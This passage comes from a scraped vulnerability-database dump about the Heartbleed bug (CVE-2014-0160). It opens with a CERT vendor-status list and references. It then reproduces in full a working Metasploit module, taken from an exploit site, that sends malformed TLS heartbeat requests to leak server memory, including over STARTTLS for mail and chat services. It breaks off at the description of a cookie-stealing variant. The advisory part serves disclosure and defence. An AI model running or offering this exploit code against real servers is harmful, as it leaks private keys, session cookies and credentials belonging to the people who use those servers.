<https://opengear.zendesk.com/entries/51667116-CVE-2014-0160-aka-Heartbleed-Opengear-products-are-not-affected>\n\n### Openwall GNU/*/Linux __ Not Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nOpenwall GNU/*/Linux is not affected. The versions of OpenSSL that we redistribute do not contain the vulnerable code.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Peplink __ Not Affected\n\nNotified: April 08, 2014 Updated: April 18, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPeplink products are NOT affected by this vulnerability.\n\n### Vendor References\n\n * <https://forum.peplink.com/threads/3062-Special-Notice-On-OpenSSL-Heartbleed-Vulnerability>\n\n### Quagga __ Not Affected\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nQuagga is not affected by this vulnerability.\n\n### SUSE Linux __ Not Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html>\n\n### Addendum\n\nSUSE Enterprise Linux uses OpenSSL 0.9.x\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### Vyatta __ Not Affected\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\n`TECHNICAL SUPPORT BULLETIN \nApril 10, 2014 \n________________________________________ \nTSB 2014-185-ASEVERITY: Low - Information \n________________________________________ \nPRODUCTS AFFECTED: \nAll Brocade products, including Vyatta \n \nCORRECTED IN RELEASE: \nAll current releases of Brocade products, including Vyatta \n \nBULLETIN OVERVIEW \n \nThe purpose of this bulletin is to provide information regarding the recently \ndisclosed vulnerability in the OpenSSL protocol documented by CVE-2014-0160 and \nalso known as \"The Heartbleed bug.\" This vulnerability takes advantage of the \nheartbeat extensions to the OpenSSL protocol (RFC6520). \n \nBrocade's family of IP products ADX, FCX, ICX, MLX, MLX-E, XMR CES, CER, RX, \nSX, VDX offering ServerIron, FastIron, NetIron, RX, Network OS, Brocade Network \nAdvisor, Vyatta and vADX software and SAN products offering FOS software do not \nmake use of the heartbeat extensions and hence are not vulnerable to the \nexploit documented in CVE-2014-0160. \nIn addition, the MyBrocade.com web site does not use OpenSSL and is not \nvulnerable to this issue. \n \n \nPROBLEM STATEMENT \nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not \nproperly handle Heartbeat Extension packets, which allows remote attackers to \nobtain sensitive information from process memory via crafted packets that \ntrigger a buffer over-read, as demonstrated by reading private keys, related to \nd1_both.c and t1_lib.c, aka the Heartbleed bug. \n``<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>`` \n \nRISK ASSESSMENT \nThere is no risk using Brocade products \nSYMPTOMS \nNot applicable. \nWORKAROUND \nNo workaround is necessary. \nCORRECTIVE ACTION \nNot applicable.`\n\n### WSO2 __ Not Affected\n\nUpdated: April 15, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nOn April 7th, a Security Advisory was issued by the OpenSSL project notifying the public of a serious vulnerability in the encryption software used by a majority of websites on the Internet.\n\n[http://connect.wso2.com/wso2/c/secadv_20140407.txt?_lid=62396&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/secadv_20140407.txt?_lid=62396&_cid=77097&_t=859269>) \n \nWe want you to know that our servers were not exposed and your WSO2 account is completely safe. Nevertheless, to ensure there is no additional risk, we strongly encourage you to request a new password. \n[http://connect.wso2.com/wso2/c/password?_lid=62397&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/password?_lid=62397&_cid=77097&_t=859269>) \n \nIf you have any questions or concerns, please email security@wso2.com. \n \nFor additional information regarding this vulnerability, please visit: \n[http://connect.wso2.com/wso2/c/heartbleed.com?_lid=62398&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/heartbleed.com?_lid=62398&_cid=77097&_t=859269>)\n\n### m0n0wall __ Not Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nm0n0wall is not affected (as it uses OpenSSL 0.9.8).\n\n### ACCESS Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### AT&T Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Alcatel-Lucent Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Apple Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Avaya, Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Barracuda Networks Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Belkin, Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Charlotte's Web Networks Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Check Point Software Technologies Unknown\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk100173](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk100173>)\n\n### Cray Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### D-Link Systems, Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DragonFly BSD Project Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### EMC Corporation Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Engarde Secure Linux Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Enterasys Networks Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Ericsson Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Force10 Networks, Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fujitsu Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM Corporation (zseries) Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM eServer Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Internet Security Systems, Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Intoto Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### MontaVista Software, Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NEC Corporation __ Unknown\n\nNotified: April 08, 2014 Updated: April 30, 2014 \n\n**Statement Date: April 30, 2014**\n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe provide information on this issue at the following URL\n\n<http://jpn.nec.com/security-info/av14-001.html> (only in Japanese)\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://jpn.nec.com/security-info/av14-001.html>\n\n### Nokia Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Novell, Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Palo Alto Networks Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Process Software Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Q1 Labs Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### QNX Software Systems Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SafeNet Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SmoothWall Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Snort Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sony Corporation Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sourcefire Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Stonesoft Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### The SCO Group Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### TippingPoint Technologies Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Turbolinux Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Watchguard Technologies, Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### ZyXEL Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### eSoft, Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### netfilter Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\nView all 99 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 5 | AV:N/AC:L/Au:N/C:P/I:N/A:N \nTemporal | 4.1 | E:F/RL:OF/RC:C \nEnvironmental | 6.5 | CDP:LM/TD:H/CR:H/IR:H/AR:ND \n \n \n\n\n### References \n\n * <http://heartbleed.com/>\n * <http://seclists.org/oss-sec/2014/q2/22>\n * <http://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>\n * <https://tools.ietf.org/html/rfc6520>\n * <http://www.openssl.org/news/openssl-1.0.1-notes.html>\n * <http://www.hut3.net/blog/cns---networks-security/2014/04/14/bugs-in-heartbleed-detection-scripts->\n * <http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html>\n * <http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/>\n * <https://www.cert.fi/en/reports/2014/vulnerability788210.html>\n * <http://xkcd.com/1354/>\n * <https://code.google.com/p/mod-spdy/issues/detail?id=85>\n * <http://www.exploit-db.com/exploits/32745/>\n * <https://access.redhat.com/security/cve/CVE-2014-0160>\n * <http://www.ubuntu.com/usn/usn-2165-1/>\n * <http://www.freshports.org/security/openssl/>\n * <https://blog.torproject.org/blog/openssl-bug-cve-2014-0160>\n\n### Acknowledgements\n\nThis vulnerability was reported by OpenSSL, who in turn credits Riku, Antti and Matti at Codenomicon and Neel Mehta of Google Security.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-0160](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-0160>) \n---|--- \n**Date Public:** | 2014-04-07 \n**Date First Published:** | 2014-04-08 \n**Date Last Updated: ** | 2016-05-13 15:26 UTC \n**Document Revision: ** | 178 \n", "modified": "2016-05-13T15:26:00", "published": "2014-04-08T00:00:00", "id": "VU:720951", "href": "https://www.kb.cert.org/vuls/id/720951", "type": "cert", "title": "OpenSSL TLS heartbeat extension read overflow discloses sensitive information", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-01-03T21:23:15", "description": "This Metasploit module implements the OpenSSL Heartbleed attack. The problem exists in the handling of heartbeat requests, where a fake length can be used to leak memory data in the response. Services that support STARTTLS may also be vulnerable.", "edition": 2, "published": "2014-04-10T00:00:00", "type": "zdt", "title": "OpenSSL Heartbeat (Heartbleed) Information Leak Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:00:00", "id": "1337DAY-ID-22129", "href": "https://0day.today/exploit/description/22129", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Auxiliary::Report\r\n\r\n CIPHER_SUITES = [\r\n 0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\r\n 0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA\r\n 0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA\r\n 0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA\r\n 0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA\r\n 0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA\r\n 0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA\r\n 0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA\r\n 0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA\r\n 0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA\r\n 0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA\r\n 0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA\r\n 0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA\r\n 0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA\r\n 0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA\r\n 0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\r\n 0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA\r\n 0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA\r\n 0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA\r\n 0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA\r\n 0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA\r\n 0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA\r\n 0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA\r\n 0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA\r\n 0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA\r\n 0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA\r\n 0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA\r\n 0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA\r\n 0x0096, # TLS_RSA_WITH_SEED_CBC_SHA\r\n 0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA\r\n 0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA\r\n 0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA\r\n 0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA\r\n 0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA\r\n 0x0005, # TLS_RSA_WITH_RC4_128_SHA\r\n 0x0004, # TLS_RSA_WITH_RC4_128_MD5\r\n 0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA\r\n 0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA\r\n 0x0009, # TLS_RSA_WITH_DES_CBC_SHA\r\n 0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5\r\n 0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5\r\n 0x00ff # Unknown\r\n ]\r\n\r\n HANDSHAKE_RECORD_TYPE = 0x16\r\n HEARTBEAT_RECORD_TYPE = 0x18\r\n ALERT_RECORD_TYPE = 0x15\r\n TLS_VERSION = {\r\n '1.0' => 0x0301,\r\n '1.1' => 0x0302,\r\n '1.2' => 0x0303\r\n }\r\n\r\n TTLS_CALLBACKS = {\r\n 'SMTP' => :tls_smtp,\r\n 'IMAP' => :tls_imap,\r\n 'JABBER' => :tls_jabber,\r\n 'POP3' => :tls_pop3\r\n }\r\n\r\n def initialize\r\n super(\r\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Information Leak',\r\n 'Description' => %q{\r\n This module implements the OpenSSL Heartbleed attack. The problem\r\n exists in the handling of heartbeat requests, where a fake length can\r\n be used to leak memory data in the response. Services that support\r\n STARTTLS may also be vulnerable.\r\n },\r\n 'Author' => [\r\n 'Neel Mehta', # Vulnerability discovery\r\n 'Riku', # Vulnerability discovery\r\n 'Antti', # Vulnerability discovery\r\n 'Matti', # Vulnerability discovery\r\n 'Jared Stafford <jspenguin[at]jspenguin.org>', # Original Proof of Concept. This module is based on it.\r\n 'FiloSottile', # PoC site and tool\r\n 'Christian Mehlmauer', # Msf module\r\n 'wvu', # Msf module\r\n 'juan vazquez' # Msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-0160'],\r\n ['US-CERT-VU', '720951'],\r\n ['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A'],\r\n ['URL', 'http://heartbleed.com/'],\r\n ['URL', 'https://github.com/FiloSottile/Heartbleed'],\r\n ['URL', 'https://gist.github.com/takeshixx/10107280'],\r\n ['URL', 'http://filippo.io/Heartbleed/']\r\n ],\r\n 'DisclosureDate' => 'Apr 7 2014',\r\n 'License' => MSF_LICENSE\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3' ]]),\r\n OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']])\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('XMPPDOMAIN', [ true, 'The XMPP Domain to use when Jabber is selected', 'localhost' ])\r\n ], self.class)\r\n\r\n end\r\n\r\n def peer\r\n \"#{rhost}:#{rport}\"\r\n end\r\n\r\n def tls_smtp\r\n # https://tools.ietf.org/html/rfc3207\r\n sock.get_once\r\n sock.put(\"EHLO #{Rex::Text.rand_text_alpha(10)}\\n\")\r\n res = sock.get_once\r\n\r\n unless res && res =~ /STARTTLS/\r\n return nil\r\n end\r\n sock.put(\"STARTTLS\\n\")\r\n sock.get_once\r\n end\r\n\r\n def tls_imap\r\n # http://tools.ietf.org/html/rfc2595\r\n sock.get_once\r\n sock.put(\"a001 CAPABILITY\\r\\n\")\r\n res = sock.get_once\r\n unless res && res =~ /STARTTLS/i\r\n return nil\r\n end\r\n sock.put(\"a002 STARTTLS\\r\\n\")\r\n sock.get_once\r\n end\r\n\r\n def tls_pop3\r\n # http://tools.ietf.org/html/rfc2595\r\n sock.get_once\r\n sock.put(\"CAPA\\r\\n\")\r\n res = sock.get_once\r\n if res.nil? || res =~ /^-/ || res !~ /STLS/\r\n return nil\r\n end\r\n sock.put(\"STLS\\r\\n\")\r\n res = sock.get_once\r\n if res.nil? || res =~ /^-/\r\n return nil\r\n end\r\n res\r\n end\r\n\r\n def tls_jabber\r\n # http://xmpp.org/extensions/xep-0035.html\r\n msg = \"<?xml version='1.0' ?>\"\r\n msg << \"<stream:stream xmlns='jabber:client' \"\r\n msg << \"xmlns:stream='http://etherx.jabber.org/streams' \"\r\n msg << \"version='1.0' \"\r\n msg << \"to='#{datastore['XMPPDOMAIN']}'>\"\r\n sock.put(msg)\r\n res = sock.get\r\n if res.nil? || res =~ /stream:error/ || res !~ /starttls/i\r\n print_error(\"#{peer} - Jabber host unknown. Please try changing the XMPPDOMAIN option.\") if res && res =~ /<host-unknown/\r\n return nil\r\n end\r\n msg = \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\"\r\n sock.put(msg)\r\n sock.get_once\r\n end\r\n\r\n def run_host(ip)\r\n connect\r\n\r\n unless datastore['STARTTLS'] == 'None'\r\n vprint_status(\"#{peer} - Trying to start SSL via #{datastore['STARTTLS']}\")\r\n res = self.send(TTLS_CALLBACKS[datastore['STARTTLS']])\r\n if res.nil?\r\n vprint_error(\"#{peer} - STARTTLS failed...\")\r\n return\r\n end\r\n end\r\n\r\n vprint_status(\"#{peer} - Sending Client Hello...\")\r\n sock.put(client_hello)\r\n\r\n server_hello = sock.get\r\n unless server_hello.unpack(\"C\").first == HANDSHAKE_RECORD_TYPE\r\n vprint_error(\"#{peer} - Server Hello Not Found\")\r\n return\r\n end\r\n\r\n vprint_status(\"#{peer} - Sending Heartbeat...\")\r\n heartbeat_length = 16384\r\n sock.put(heartbeat(heartbeat_length))\r\n hdr = sock.get_once(5)\r\n if hdr.blank?\r\n vprint_error(\"#{peer} - No Heartbeat response...\")\r\n return\r\n end\r\n\r\n unpacked = hdr.unpack('Cnn')\r\n type = unpacked[0]\r\n version = unpacked[1] # must match the type from client_hello\r\n len = unpacked[2]\r\n\r\n # try to get the TLS error\r\n if type == ALERT_RECORD_TYPE\r\n res = sock.get_once(len)\r\n alert_unp = res.unpack('CC')\r\n alert_level = alert_unp[0]\r\n alert_desc = alert_unp[1]\r\n msg = \"Unknown error\"\r\n # http://tools.ietf.org/html/rfc5246#section-7.2\r\n case alert_desc\r\n when 0x46\r\n msg = \"Protocol error. Looks like the chosen protocol is not supported.\"\r\n end\r\n print_error(\"#{peer} - #{msg}\")\r\n disconnect\r\n return\r\n end\r\n\r\n unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[datastore['TLSVERSION']]\r\n vprint_error(\"#{peer} - Unexpected Heartbeat response\")\r\n disconnect\r\n return\r\n end\r\n\r\n vprint_status(\"#{peer} - Heartbeat response, checking if there is data leaked...\")\r\n heartbeat_data = sock.get_once(heartbeat_length) # Read the magic length...\r\n if heartbeat_data\r\n print_good(\"#{peer} - Heartbeat response with leak\")\r\n report_vuln({\r\n :host => rhost,\r\n :port => rport,\r\n :name => self.name,\r\n :refs => self.references,\r\n :info => \"Module #{self.fullname} successfully leaked info\"\r\n })\r\n vprint_status(\"#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}\")\r\n else\r\n vprint_error(\"#{peer} - Looks like there isn't leaked information...\")\r\n end\r\n end\r\n\r\n def heartbeat(length)\r\n payload = \"\\x01\" # Heartbeat Message Type: Request (1)\r\n payload << [length].pack(\"n\") # Payload Length: 16384\r\n\r\n ssl_record(HEARTBEAT_RECORD_TYPE, payload)\r\n end\r\n\r\n def client_hello\r\n # Use current day for TLS time\r\n time_temp = Time.now\r\n time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i\r\n\r\n hello_data = [TLS_VERSION[datastore['TLSVERSION']]].pack(\"n\") # Version TLS\r\n hello_data << [time_epoch].pack(\"N\") # Time in epoch format\r\n hello_data << Rex::Text.rand_text(28) # Random\r\n hello_data << \"\\x00\" # Session ID length\r\n hello_data << [CIPHER_SUITES.length * 2].pack(\"n\") # Cipher Suites length (102)\r\n hello_data << CIPHER_SUITES.pack(\"n*\") # Cipher Suites\r\n hello_data << \"\\x01\" # Compression methods length (1)\r\n hello_data << \"\\x00\" # Compression methods: null\r\n\r\n hello_data_extensions = \"\\x00\\x0f\" # Extension type (Heartbeat)\r\n hello_data_extensions << \"\\x00\\x01\" # Extension length\r\n hello_data_extensions << \"\\x01\" # Extension data\r\n\r\n hello_data << [hello_data_extensions.length].pack(\"n\")\r\n hello_data << hello_data_extensions\r\n\r\n data = \"\\x01\\x00\" # Handshake Type: Client Hello (1)\r\n data << [hello_data.length].pack(\"n\") # Length\r\n data << hello_data\r\n\r\n ssl_record(HANDSHAKE_RECORD_TYPE, data)\r\n end\r\n\r\n def ssl_record(type, data)\r\n record = [type, TLS_VERSION[datastore['TLSVERSION']], data.length].pack('Cnn')\r\n record << data\r\n end\r\nend\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22129"}, {"lastseen": "2018-03-14T02:43:51", "edition": 2, "description": "This python script is a modification of the heartbleed proof of concept exploit that looks for cookies, specifically user sessions.", "published": "2014-04-09T00:00:00", "type": "zdt", "title": "Heartbleed User 